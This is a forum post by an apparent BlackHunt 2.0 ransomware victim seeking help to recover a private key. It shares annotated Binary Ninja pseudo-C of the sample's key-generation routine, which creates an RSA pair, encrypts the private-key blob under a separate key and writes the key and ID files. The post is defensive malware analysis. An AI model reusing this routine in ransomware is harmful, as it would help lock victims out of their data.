My computer has been infected with BlackHunt 2.0 and I’ve “decompiled” the executable with BinaryNinja. I think I’ve found the function that encrypts the PrivateKey file in the hard disk.
I think somewhere in it there is something about the key that is used to encrypt the private key file.
Can anyone help me please?
// Binary Ninja pseudo-C of the routine the log strings call "GenKey". What the visible code does:
//   1. CryptGenKey creates an exportable RSA key pair (handle stored in the global data_47a32c);
//   2. CryptExportKey dumps the private key (blob type 7 = PRIVATEKEYBLOB, hExpKey = 0, i.e. in plaintext)
//      into i_1 and the public key (blob type 6 = PUBLICKEYBLOB) into lpMem_1, each via the usual
//      size-query-then-export double call;
//   3. the private-key blob is encrypted in five chunks with CryptEncrypt under the key handle
//      data_47a328 and the ciphertext is written to the *_Private.key file;
//   4. the public-key blob is written unencrypted to *_Public.key, re-imported into data_479b00,
//      and a 0x20-byte ID is written to *_ID.txt;
//   5. all three heap buffers are zeroed and freed.
// Returns 1 (ebx_7) on success, 0 on any failure; failures are reported through sub_401d20,
// which looks like a logging routine (inferred from its string arguments, confirm).
// NOTE(review): data_47a328 -- the key that encrypts the private-key blob -- is only READ in this
// function; it is never created or assigned here. How it is obtained (generated, derived, or
// imported from a blob) has to be found wherever that global is written.
// NOTE(review): data_47a330 is presumably a heap handle and data_478108 the CSP handle -- inferred
// from how they are passed, not established on this page.
int32_t sub_402590() {
int32_t __saved_ebp;
// MSVC /GS stack cookie; decompiler artifact, not program logic.
int32_t eax_1 = (__security_cookie ^ & __saved_ebp);
// data_479b08 looks like a verbose/debug flag gating the "GenKey" / "return GenKey" trace lines.
if (data_479b08 != 0) {
sub_401d20(u "GenKey");
}
uint32_t var_c = 0;
void * var_24 = nullptr;
int32_t pdwDataLen = 0;
uint32_t i_11 = 0;
char * i;
// 0x140-byte work buffer for one chunk; allocation is retried until it succeeds.
do {
i = HeapAlloc(data_47a330, HEAP_ZERO_MEMORY, 0x140);
} while (i == 0);
// Algid 1 = AT_KEYEXCHANGE; dwFlags 0x08000001 = key length 0x0800 (2048 bits) in the upper
// 16 bits | CRYPT_EXPORTABLE (per CryptoAPI documentation). New key pair handle -> data_47a32c.
if (CryptGenKey(data_478108, 1, 0x8000001, & data_47a32c) == 0) {
enum WIN32_ERROR var_40 = GetLastError();
sub_401d20(u "CryptGenKey Faild! GetLastError …");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
// Size query for the PRIVATEKEYBLOB (type 7): NULL buffer, length returned in pdwDataLen.
if (CryptExportKey(data_47a32c, 0, 7, 0, nullptr, & pdwDataLen) == 0) {
enum WIN32_ERROR var_40_2 = GetLastError();
sub_401d20(u "CryptExportPrivateKey1 Faild! Ge…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
// Over-allocate by 0x40 bytes beyond the reported blob size.
uint32_t dwBytes = (pdwDataLen + 0x40);
uint8_t * i_1;
do {
i_1 = HeapAlloc(data_47a330, HEAP_ZERO_MEMORY, dwBytes);
} while (i_1 == 0);
// Actual export: i_1 now holds the plaintext private-key blob.
if (CryptExportKey(data_47a32c, 0, 7, 0, i_1, & pdwDataLen) == 0) {
enum WIN32_ERROR var_40_5 = GetLastError();
sub_401d20(u "CryptExportPrivateKey2 Faild! Ge…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
// Size query for the PUBLICKEYBLOB (type 6): length returned in i_11.
if (CryptExportKey(data_47a32c, 0, 6, 0, nullptr, & i_11) == 0) {
enum WIN32_ERROR var_40_7 = GetLastError();
sub_401d20(u "CryptExportKey1 Faild! GetLastEr…");
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return 0;
}
// sub_4056b0 appears to be an allocation wrapper (its NULL result is handled in the else branch
// with a "memory allocation" message) -- confirm.
uint8_t * lpMem_1 = sub_4056b0(i_11);
int32_t ebx_7;
wchar16 *
const var_44_1;
if (lpMem_1 != 0) {
// Export the public-key blob into lpMem_1.
if (CryptExportKey(data_47a32c, 0, 6, 0, lpMem_1, & i_11) == 0) {
enum WIN32_ERROR var_40_10 = GetLastError();
var_44_1 = u "CryptExportKey2 Faild! GetLastEr…";
goto label_402a24;
}
// 0x40000000 = GENERIC_WRITE; CREATE_NEW fails if the file already exists.
BOOL eax_17 = CreateFileW(u "C:\ProgramData#BlackHunt_Privat…", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
BOOL var_2c_1 = eax_17;
// NOTE(review): CreateFileW reports failure with INVALID_HANDLE_VALUE (-1), not 0, so this
// fallback to a relative path is probably never reached on failure; the remaining arguments
// are 0 because eax_17 is 0 on this branch. The same pattern repeats for the public-key
// and ID files below.
if (eax_17 == 0) {
eax_17 = CreateFileW(u "#BlackHunt_Private.key", 0x40000000, eax_17, eax_17, CREATE_NEW, eax_17, eax_17);
var_2c_1 = eax_17;
if (eax_17 == 0) {
sub_401d20(u "Cannot Create PrivKey File");
goto label_402a2c;
}
}
int32_t i_2 = 0;
int32_t i_7 = 0;
void lpNumberOfBytesWritten;
BOOL eax_18;
// Chunked encryption of the private-key blob: 5 iterations, first chunk 0xec bytes, the other
// four 0xea bytes each (0xec + 4*0xea = 0x494 = 1172 bytes, which matches the size of a 2048-bit
// PRIVATEKEYBLOB -- verify against pdwDataLen).
do {
// Zero the 0x100-byte output area before each chunk.
BOOL j = 0;
do {
i[j] = 0;
j = (j + 1);
} while (j < 0x100);
void * j_1 = nullptr;
// Copy the next chunk from i_1 + var_24 into i; var_c receives the chunk length.
if (i_2 != 0) {
do {
eax_17 = * ((j_1 + i_1) + var_24);*(j_1 + i) = eax_17;
j_1 = (j_1 + 1);
} while (j_1 < 0xea);
var_c = 0xea;
} else {
do {
eax_17 = * ((j_1 + i_1) + var_24);*(j_1 + i) = eax_17;
j_1 = (j_1 + 1);
} while (j_1 < 0xec);
var_c = 0xec;
}
// Encrypt the chunk in place under data_47a328 (hHash = 0, Final = TRUE, dwFlags = 0,
// dwBufLen = 0x100). A 256-byte output per chunk is consistent with a 2048-bit RSA key, but
// the algorithm of data_47a328 is not visible in this function.
eax_18 = CryptEncrypt(data_47a328, 0, 1, 0, i, & var_c, 0x100);
if (eax_18 == 0) {
enum WIN32_ERROR var_40_20 = GetLastError();
var_44_1 = u "EncryptKey Faild! GetLastError =…";
break;
}
int32_t ebx_3;
// ebx_3 is 1 on the first iteration only (i_7 is still 0).
ebx_3 = i_7 == 0;
// Write var_c ciphertext bytes of this chunk.
if (WriteFile(var_2c_1, i, var_c, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_19 = GetLastError();
var_44_1 = u "Cannot Write PrivKey To File! Ge…";
break;
}
// Advance the source offset: 0xea + 2 = 0xec after the first chunk, 0xea afterwards.
var_24 = (var_24 + ((ebx_3 < < 1) + 0xea));
i_2 = (i_7 + 1);
i_7 = i_2;
} while (i_2 < 5);
// Only the CryptEncrypt failure is detected here. NOTE(review): a WriteFile failure breaks
// out of the loop with eax_18 still nonzero, so it appears to fall through to CloseHandle and
// continue as if the private-key file were complete; the message stored in var_44_1 is then
// never logged -- confirm against the disassembly.
if (eax_18 == 0) {
goto label_402a24;
}
CloseHandle(var_2c_1);
// Public-key file: same CreateFileW / relative-path fallback pattern as above.
HANDLE eax_19 = CreateFileW(u "C:\ProgramData#BlackHunt_Public…", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
HANDLE ebx_5 = eax_19;
if (ebx_5 == 0) {
ebx_5 = CreateFileW(u "#BlackHunt_Public.key", 0x40000000, eax_19, eax_19, CREATE_NEW, eax_19, eax_19);
if (ebx_5 == 0) {
sub_401d20(u "Cannot Create PubKey File");
goto label_402a2c;
}
}
// The public-key blob is written as-is (not encrypted), i_11 bytes.
if (WriteFile(ebx_5, lpMem_1, i_11, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_14 = GetLastError();
var_44_1 = u "Cannot Write PubKey To File! Get…";
goto label_402a24;
}
CloseHandle(ebx_5);
// Re-import the freshly exported public key into the global data_479b00 (hPubKey = 0,
// dwFlags = 0). What data_479b00 is used for afterwards is not visible here.
if (CryptImportKey(data_478108, lpMem_1, i_11, 0, 0, & data_479b00) == 0) {
sub_401d20(u "Import PubKey failed!!\n");
goto label_402a2c;
}
// ID file: same CreateFileW pattern.
HANDLE eax_24 = CreateFileW(u "C:\ProgramData#BlackHunt_ID.txt", 0x40000000, FILE_SHARE_NONE, nullptr, CREATE_NEW, SECURITY_ANONYMOUS, nullptr);
HANDLE ebx_6 = eax_24;
if (ebx_6 == 0) {
ebx_6 = CreateFileW(u "#BlackHunt_ID.txt", 0x40000000, eax_24, eax_24, CREATE_NEW, eax_24, eax_24);
if (ebx_6 == 0) {
sub_401d20(u "Cannot Create ID File");
goto label_402a2c;
}
}
// sub_4022a0 is called immediately before data_46f438 is read; presumably it fills the ID
// string -- confirm.
sub_4022a0();
void * ecx_12 = nullptr;
int16_t i_3;
// Copy the NUL-terminated UTF-16 string at 0x46f438 to another global (the destination is
// expressed relative to the already-incremented pointer, so it starts at 0x47a2e4).
do {
i_3 = * (ecx_12 + 0x46f438);
ecx_12 = (ecx_12 + 2);*(ecx_12 + 0x47a2e2) = i_3;
} while (i_3 != 0);
// Write a fixed 0x20 bytes (16 UTF-16 code units) of the ID, regardless of its string length.
if (WriteFile(ebx_6, & data_46f438, 0x20, & lpNumberOfBytesWritten, nullptr) == 0) {
enum WIN32_ERROR var_40_17 = GetLastError();
var_44_1 = u "Cannot Write ID To File! GetLast…";
goto label_402a24;
}
CloseHandle(ebx_6);
// Success.
ebx_7 = 1;
} else {
enum WIN32_ERROR var_40_8 = GetLastError();
var_44_1 = u "PublicKeyBlob memory allocation …";
// Shared error tail: label_402a24 logs the pending message, label_402a2c only sets failure.
label_402a24: sub_401d20(var_44_1);
label_402a2c: ebx_7 = 0;
}
CryptDestroyKey(data_47a32c);
// Zero the pdwDataLen bytes of the plaintext private-key blob before freeing it, so the
// plaintext private key is not left behind on the heap by this function.
int32_t ecx_13 = pdwDataLen;
uint8_t * i_8 = i_1;
if (ecx_13 != 0) {
int32_t i_4;
do {
* i_8 = 0;
i_8 = & i_8[1];
i_4 = ecx_13;
ecx_13 = (ecx_13 - 1);
} while (i_4 != 1);
}
// Zero the i_11 bytes of the public-key blob.
uint32_t i_10 = i_11;
char * lpMem = lpMem_1;
char * lpMem_2 = lpMem;
if (i_10 != 0) {
uint32_t i_5;
do {
* lpMem_2 = 0;
lpMem_2 = & lpMem_2[1];
i_5 = i_10;
i_10 = (i_10 - 1);
} while (i_5 != 1);
}
// Zero the chunk buffer. The decompiler typed the down-counter as HEAP_FLAGS: it starts at
// HEAP_CREATE_SEGMENT_HEAP (0x100) and stops after HEAP_NO_SERIALIZE (1), i.e. 0x100 bytes,
// leaving dwFlags == 0 -- which is the flags value the first HeapFree below then receives.
enum HEAP_FLAGS dwFlags = HEAP_CREATE_SEGMENT_HEAP;
char * i_9 = i;
enum HEAP_FLAGS i_6;
do {
* i_9 = 0;
i_9 = & i_9[1];
i_6 = dwFlags;
dwFlags = (dwFlags - 1);
} while (i_6 != HEAP_NO_SERIALIZE);
HeapFree(data_47a330, dwFlags, lpMem);
HeapFree(data_47a330, HEAP_NONE, i_1);
HeapFree(data_47a330, HEAP_NONE, i);
if (data_479b08 != 0) {
sub_401d20(u "return GenKey");
}
@ __security_check_cookie @4((eax_1 ^ & __saved_ebp));
return ebx_7;
}
Thanks.
I’m using AI to understand and find the critical functions.